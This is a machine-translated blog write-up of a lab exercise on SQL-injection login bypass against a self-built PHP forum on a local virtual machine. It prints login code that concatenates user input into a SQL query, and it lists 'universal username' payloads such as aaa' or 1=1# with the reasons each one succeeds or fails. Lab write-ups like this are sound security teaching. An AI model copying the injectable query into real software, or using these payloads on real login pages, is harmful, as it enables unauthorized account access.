当前位置：网站首页>[business security-04] universal user name and universal password experiment

[business security-04] universal user name and universal password experiment

2022-06-27 13:48:00 【Like the wind 9】

Catalog

1 Experiment introduction
- 1.1 The experiment purpose
- 1.2 Experimental environment
2 experiment
3 summary

1 Experiment introduction

1.1 The experiment purpose

Because the web server is not rigorous enough to filter the code , There may be a risk of bypassing the universal user name or universal password .
Deepen the understanding of web page code and SQL Code understanding .

1.2 Experimental environment

Experimental target ——win2008 virtual machine ：

The experimental range of this section is at win2008 The system is based on phpstudy Build a simple website ,win2008 And phpstudy The installation process of can refer to 《【 Language environment 】WAMP Environment deployment and optimization — With win2008R2SP1 For the operating system 》, The construction process of the website can refer to 《【(SQL+HTML+PHP) comprehensive 】 A case of comprehensive development of a simple forum website （ With user registration 、 Sign in 、 Cancellation 、 Modify the information 、 Message and other functions ）》.
This experiment is conducted on the login page of the forum .
The website's verification code for login account password is as follows .

<?php
include "../inc/dblink.inc.php"// Include the files of the database connection in this file 
?>
<html>
<head>
    <meta charset="utf-8">
    <title>   Sign in ---- Forum today </title>

</head>
<body>
    <h1> Forum today BBS</h1>
    <?php
    if(isset($_POST['userSubmit'])){
    
        if($_POST['vcode']==$_COOKIE['vcode']){
    
            $userName=$_POST['userName'];
            $userPass=$_POST['userPass'];
            $sql="select * from users where name='".$userName."' && password='".md5($userPass)."'";
            if($results=mysqli_query($link,$sql)){
    
                if(mysqli_num_rows($results)>0){
    
                    setcookie('name',$userName,time()+3600*24, "/PHP/jrltbbs");
                    // Be careful cookie The path of , Different path cookie Think it's two cookie
                    echo " Login successful , return <a href='../index.php'> home page </a> or <a href='./index.php'> Personal center </a>";
                }else{
    
                    echo " Wrong user name or password ,<a href='./login.php'> Please login again </a>";
                }
            }else{
    
                die("sql There is a mistake in the sentence ");
            }

        }else{
    
            echo " Verification code error ,<a href='./login.php'> Please login again </a>";
        }
    }else{
    
        $html=<<<HTML
       <form 
        method="post">
         user name ：<input type="text" name="userName"><br/>
         password ：<input type="password" name="userPass"><br/>
         Verification Code ：<input type="text" name="vcode"> 
        <iframe src= "./vcode.php" width="100" height=30 frameboder="0"></iframe><br>
        <input type="submit" name="userSubmit"  value=" Sign in ">
    </form>
HTML;
        echo $html;
    }
    ?>
    <hr/>
</body>
</html>

<?php
mysqli_close($link);
?>

Based on the above sql sentence , Can be preliminarily analyzed , The key variable is name, instead of password（ No matter what you type , It's all going on md5 encryption , Unable to proceed Sql Statement splicing ）

2 experiment

2.1 experimental analysis

（1） Above code 8 Line is used to check whether the account and password entered by the client exist in the database , The key to successful login lies in 10 That's ok if Statement to determine whether the condition is true , in other words As long as the user name or password constructed can make SQL Statement can successfully query and return results , You can log in .
（2） because SQL The statement is closed with single quotation marks , Therefore, the constructed statement needs to pay attention to the single quotation marks before and after shielding .

2.2 Experimental process

（1） Enter url http://172.16.1.1/PHP/jrltbbs/member/login.php Go to the login page of the website
Insert picture description here

（2） Enter the user name in the login interface aaa' or 1=1#, Password optional , as follows , Click login .
Insert picture description here

（3） You can see the successful login .
Insert picture description here
（4） Click on personal Center , You can see that the current login account is the first account registered in the database .

2.3 The experimental results are summarized — Universal user name and universal password

The experiment is carried out with the combination of different user names and passwords. The results are as follows . The universal user name letters in the table （ Such as aaa and a）, Note whether the user exists in the database or not , Will lead to different results .

user name	password	result	analysis
aaa’ or 1=1#	at will	success	Use single quotation marks to mask the single quotation marks before variables , use # Comment out variables and subsequent statements
aaa’ or ‘1’='1	at will	Failure	because and The priority ratio or High priority , Statement first ’1’=‘1’ and password = ' at will ’ Statement get false, Re execution name = ‘aaa’ or false, The results are false, therefore SQL Statement cannot query the content , Login failed .
a’ or ‘1’='1	at will	success	Unlike the previous combination , here a Yes, I happen to encounter the user name in the database , therefore or Statement executed successfully , Suitable for blasting specific user names
a’#	at will	success	here a Yes, I happen to encounter the user name in the database , So the execution was successful , Suitable for blasting specific user names
at will	aaa’ or 1=1#	Failure	Because the password field is in the code MD5 Encoded , Unable to realize the function of statement construction
at will	aaa’ or ‘1’=‘1’	Failure	ditto

Be careful ： When the background code filters and converts the input parameters , We need to pay attention to the various bypass skills we have learned before .